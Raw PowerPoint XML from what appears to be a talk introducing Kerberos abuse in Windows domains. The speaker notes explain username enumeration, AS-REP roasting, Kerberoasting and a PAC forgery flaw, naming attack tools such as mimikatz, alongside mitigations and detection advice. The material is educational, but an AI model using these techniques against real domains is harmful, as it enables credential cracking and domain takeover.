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305" r:id="rId3"/>
    <p:sldId id="271" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="277" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="284" r:id="rId15"/>
    <p:sldId id="321" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="281" r:id="rId18"/>
    <p:sldId id="282" r:id="rId19"/>
    <p:sldId id="283" r:id="rId20"/>
    <p:sldId id="297" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="322" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
    <p:sldId id="298" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="323" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="299" r:id="rId30"/>
    <p:sldId id="290" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="324" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="293" r:id="rId38"/>
    <p:sldId id="295" r:id="rId39"/>
    <p:sldId id="301" r:id="rId40"/>
    <p:sldId id="304" r:id="rId41"/>
    <p:sldId id="261" r:id="rId42"/>
    <p:sldId id="306" r:id="rId43"/>
    <p:sldId id="307" r:id="rId44"/>
    <p:sldId id="270" r:id="rId45"/>
    <p:sldId id="262" r:id="rId46"/>
    <p:sldId id="308" r:id="rId47"/>
    <p:sldId id="310" r:id="rId48"/>
    <p:sldId id="311" r:id="rId49"/>
    <p:sldId id="309" r:id="rId50"/>
    <p:sldId id="312" r:id="rId51"/>
    <p:sldId id="316" r:id="rId52"/>
    <p:sldId id="318" r:id="rId53"/>
    <p:sldId id="313" r:id="rId54"/>
    <p:sldId id="319" r:id="rId55"/>
    <p:sldId id="296" r:id="rId56"/>
    <p:sldId id="314" r:id="rId57"/>
    <p:sldId id="302" r:id="rId58"/>
    <p:sldId id="325" r:id="rId59"/>
    <p:sldId id="327" r:id="rId60"/>
    <p:sldId id="328" r:id="rId61"/>
    <p:sldId id="329" r:id="rId62"/>
    <p:sldId id="331" r:id="rId63"/>
    <p:sldId id="332" r:id="rId64"/>
    <p:sldId id="333" r:id="rId65"/>
    <p:sldId id="334" r:id="rId66"/>
    <p:sldId id="330" r:id="rId67"/>
    <p:sldId id="265"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70058" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="99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6C2D4-82EA-454D-AC3A-C6A019AEF798}"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78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362173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talk about some Kerberos abuse because it’s the default authentication protocol in Windows and therefore it shouldn’t be ignored just because it’s a bit complicated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a pretty big area, every time I thought I was getting to the bottom of it I found another blogpost with reference to another area which I needed to look into…. I’ve therefore called this an introduction, because even thought I’m going to touch on 10 different issues, I’m sure there is more.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19354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send another request to the KDC with our TGT ticket and request access to the CIFS service on the remote server.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191023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KDC generates a session key for use by the user and the service, and encrypts it with the user’s key and the service’s key, packages it up in a ticket and sends it back to the user.</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141720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then presents the service ticket to the service, in this case in an SMB Session Setup Request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the service is able to decrypt its half of the ticket it trusts that the user is who they say they are because only the KDC would be able to encrypt the session key for the service – because only the service and the KDC know the service’s key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>o the service response checks its own configuration to see if this user is authorized to access the service, and response appropriately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>hat’s another interesting point to note, the KDC is not responsible for authorization, just authentication. The KDC validates and you are who you say you are, but its still down to the service to determine if you are allowed to use the service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244353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trust you were all captivated by walkthrough of a successful Kerberos interaction between a legitimate user, the KDC, and a service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sorry about that, but understanding those steps is kind of important to understanding what we can do at each step of that process for our benefit….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So without further ado, here are some more packet captures.</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208483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very first interaction with the KDC can be used for username enumeration, completely unauthenticated.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1252769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present an invalid username in that initial Authentication Service Request, we receive the error Principal Unknown. Where as a valid username will error requiring pre-authentication, stating the account is disabled or locked out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So this is a pretty classic example of a username enumeration issue. Send a valid username get one response, send an invalid username get an error. While many, including Microsoft, don’t consider username enumeration to be a vulnerability in itself, personally I find being able to identify valid usernames to target for password guessing or other attacks to be quite handy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3944218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aware that I’m a big fan of automating all the things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So instead of sending candidate usernames through net use commands and searching through packet captures, I thought it would be good to have a tool that did this…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Luckily for my limited free time, a few tools already exist to do this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216962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fix for this since its just how the protocol works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However you might want to consider detecting when a machine is rapidly sending out AS-REQ packets that result in PRINCIPAL UNKNOWN since that is likely to indicate someone is trying to enumerate valid usernames, and getting a bunch wrong.</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626167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Little bit further along in the process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember I said that Kerberos is running over an untrusted network? Well there I am, completely untrustworthy and listening for all of the Kerberos messages flying by.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2540875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If you can intercept AS_REQ requests you can subject them to an offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t> attack. Attempt to decrypt the timestamp with possible passwords, when the decrypted data looks like a timestamp you’ve cracked it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>Key is NTLM hash for systems up to and including: XP and 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>Vista and above does not use NTLM by default, more difficult to crack, partly due to lack of support (https://github.com/hashcat/hashcat/issues/1386)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently I don’t know of a tool that lets you do this easily, if anyone knows of or finds one, let me know :)</a:t>
            </a:r>
          </a:p>
          <a:p>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281351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be talking about Kerberos in the context of Windows, so I’m sorry if you’ve read the RFC and know that I’m not always using the exact term, but the Windows equivalent – that’s because I know the Windows Domain better than the Kerberos Realm so its easier for me to remember and is more relevant in context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is also a really broad topic and I’m not going to be able to cover everything, who knows maybe I’ll deliver a part 2 of this talk some day with some more information and techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>None of this is original research, and all of it has been out there for a while, but I hope you’ll learn something anyway.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3082238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78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2383818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identify vulnerable accounts if you already have authentication using an LDAP filter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powerview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has this implemented as well if that’s you thing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But usually when I’m trying this I don’t have credentials yet, so using ASREPROAST from HarmJ0y is the way to go. You can iterate through usernames and it will print out the hash if the account is vulnerable. You need to custom compile john with a modified format that HarmJ0y has provided, but other than that it should work pretty well. No support in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yet – but there is an open issue if anyone wants to contribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or if you wanted to go old school you could use the Kerberos party tricks script from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Geoff Janjua at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exumbraops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. This is the script I have successfully used in the past to pull out an AS-REP for a vulnerable use and crack it. But it’s a bit of a flaky tool and as I recall I had to fiddle with the code a bit to get it to work…</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751417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Principle Names are used to determine which account key is used to encrypt a service ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two types, host-based linked to a domain computer account and therefore of little value to us since the computer account password is long and random so we are going to have a hard time cracking it; and arbitrary which are usually linked to user accounts and therefore much more interesting since as we all know, user accounts often have horrible passwords on them, particularly if it’s a user account being used as a service account – someone set that password a long time ago and no one will want to change it in case it breaks something….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A service running on a server in the network often needs to be able to authenticate to resources within the domain, the legacy way to do this is to configure a domain user account for the service to run as. Configuring this involves setting up SPNs on that account for the service, for example an account configured for an MSSQL service to run as might have an  SPN like this: MSSQLSvc/mssql1.testdomain.com:1433 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user requests a TGS for this SPN, the KDC will lookup which account the SPN is registered to, generate a session key, and generate a service ticket containing the key encrypted with the service account’s long term key. This gives us some material we can subject to an offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack in order to recover the service account password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cool thing about these SPNs is that the service doesn’t need to be accessible, available, or even exist for us to exploit the SPN. This configuration is on the KDC and the interaction I’m about to talk about is only between the client (in this case the attacker) and the KDC.</a:t>
            </a:r>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3627721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78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2712200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old school process to accomplish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kerbroasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is described by harj0y on his blog.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially, identify the accounts, request the TGS for the SPN’s using setspn.exe or a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to extract the tickets from member, convert the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> output to a format john can process and get cracking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I’ve copy pasted the section from Harmj0y’s blog because luckily I was late to the party so this process was made a lot nicer by the time I heard of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interesting point to note here though is that you can extract Kerberos tickets from memory using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… its not just for pulling out clear text passwords… but I’ll come back to this later.</a:t>
            </a:r>
          </a:p>
          <a:p>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675749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going to dwell too much on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kerbroasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> because its now a pretty much point and click process. You need valid user credentials, and any one of these tool (and there are probably others) in order to recover the encrypted material that you can then crack with John the Ripper or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a great way to escalate privileges within a domain, I’ve personally accessed domain administrator accounts using this technique. As with the AS-REP Roasting, you are reliant on your password cracking prowess and poor password selection.</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2410236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mitigate, but not prevent this attack by configuring service accounts with a password greater than 25 characters long, to reduce the probability of a successful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You could also implement managed service accounts, as this password is long and complex and rotated regularly and automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sean Metcalf has a blog post around detection of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerbroasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which goes into a fair amount of detail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But it comes down to monitoring Kerberos authentication events, sifting through them to flag suspicious ones such as those that only support RC4-HMAC, or setting up a honeypot SPN whereby you know that if anyone is requesting that SPN or logs into the account that SPN is registered to, something malicious is going on.</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748528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The Microsoft Windows Kerberos KDC fails to properly check for valid signatures in the Privilege Attribute Certificate (PAC) included with the Kerberos ticket request. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A domain user may forge the information contained in the PAC to request higher user privileges than should be allowed. Since the KDC does not verify the signature correctly, it will award the user the requested privileges, effectively making the user a domain administrator and allowing complete compromise of the entire domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1"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Originally there was a python tool called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>pyKEK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
